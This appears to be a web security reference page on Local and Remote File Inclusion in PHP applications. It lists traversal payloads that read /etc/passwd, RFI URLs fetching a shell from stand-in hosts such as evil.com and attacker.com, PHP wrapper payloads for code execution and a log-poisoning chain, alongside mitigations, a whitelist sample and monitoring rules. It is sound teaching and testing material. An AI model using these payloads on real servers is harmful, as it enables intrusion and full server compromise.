Home / Web Security / LFI & RFI
Critical Severity | OWASP A03:2021

🔴 Local File Inclusion (LFI) & Remote File Inclusion (RFI)

CWECWE-98, CWE-94
OWASPA03:2021 Injection
CVSS 3.19.8 (Critical)
Attack VectorNetwork

🧠 Description

What is LFI/RFI?

LFI allows attackers to include local files on the server. RFI allows attackers to include remote files from attacker-controlled servers. Both can lead to RCE when combined with log poisoning or other techniques.

LFI/RFI allows:
  • Read sensitive files
  • Remote Code Execution
  • Execute malicious code
  • Full server compromise

🏷️ Classification

  • LFI: Include local files (../etc/passwd)
  • RFI: Include remote files (http://evil.com/shell.txt)
  • PHP Wrappers: php://filter, expect://, etc.

🎯 Attack Surface

  • ✅ Template includes
  • ✅ Language includes
  • ✅ Theme loaders
  • ✅ Module loaders

🔍 Detection

  • Test: ?page=../../etc/passwd
  • Test: ?page=http://evil.com/shell.txt
  • Test: ?file=php://filter/convert.base64-encode/resource=config.php

🔧 Workflow

  1. Find include() or require() functions
  2. Test with LFI payloads
  3. Test with RFI payloads
  4. Use wrappers for RCE

💣 Basic Payloads

../../etc/passwd
../etc/passwd
....//....//....//etc/passwd
..%2f..%2f..%2fetc%2fpasswd
RFI Payloads
http://attacker.com/shell.txt
ftp://attacker.com/shell.txt

🚀 Advanced Payloads

PHP Wrappers
php://filter/convert.base64-encode/resource=index.php
php://input (POST code execution)
expect://whoami (RCE)
data://text/plain,

📝 Proof of Concept

# LFI
GET /index.php?page=../../etc/passwd

# RCE via php://input
POST /index.php?page=php://input

💥 Impact

Severity: CRITICAL
  • Remote Code Execution
  • Full server compromise
  • Complete data breach

🔗 Attack Chain

LFI to RCE via Log Poisoning
  1. Find LFI in include()
  2. Inject PHP to access.log via User-Agent
  3. Include access.log to execute code

🛡️ Mitigation

✅ Disable allow_url_include: Prevent RFI

✅ Use file IDs: Map filenames to IDs

✅ Validate paths: Ensure file is in allowed directory

🏰 Advanced

# php.ini
allow_url_include = Off
allow_url_fopen = Off

# Whitelist approach
$allowed = ['home', 'about', 'contact'];
if(in_array($_GET['page'], $allowed)) {
    include($_GET['page'] . '.php');
}

📊 Monitoring

  • Alert on php:// wrappers
  • Alert on ../ in parameters

🔐 Security Controls

ControlImplementation
Disable RFIallow_url_include=Off
WhitelistUse file ID mapping

🛠️ Tools

LFISuite

LFI automated exploitation

Burp

Manual testing

📚 References

🔄 Retest Steps

StepAction
1Disable allow_url_include
2Re-test with RFI payload
Back to Web Security